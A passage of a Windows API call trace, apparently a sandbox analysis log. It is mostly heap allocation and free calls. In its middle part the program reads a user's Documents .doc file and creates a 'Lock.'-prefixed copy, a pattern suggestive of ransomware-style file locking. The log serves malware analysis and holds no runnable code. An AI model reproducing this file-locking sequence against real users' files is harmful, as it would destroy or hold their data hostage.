hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0259.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0259.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0259.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0259.242] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0259.242] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.243] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0259.243] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0259.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0259.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0259.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0259.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0259.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0259.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0259.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0259.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0259.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/1fyOaNMvpe0HLFYMO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1fyoanmvpe0hlfymo.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0259.244] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.245] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0259.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0259.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0259.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0259.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0259.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0259.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0259.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.246] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0259.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0259.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0259.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3561010 [0259.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0259.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.1fyOaNMvpe0HLFYMO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.1fyoanmvpe0hlfymo.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0259.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0259.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0259.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0259.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0259.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0259.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0259.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0259.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0259.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0259.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0259.830] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0259.830] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0259.883] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x229a, lpOverlapped=0x0) returned 1 [0259.883] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0259.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1229a) returned 0x24b7a48 [0259.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0259.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0259.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0259.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0259.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1229a) returned 0x24c9cf0 [0259.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0259.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.887] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 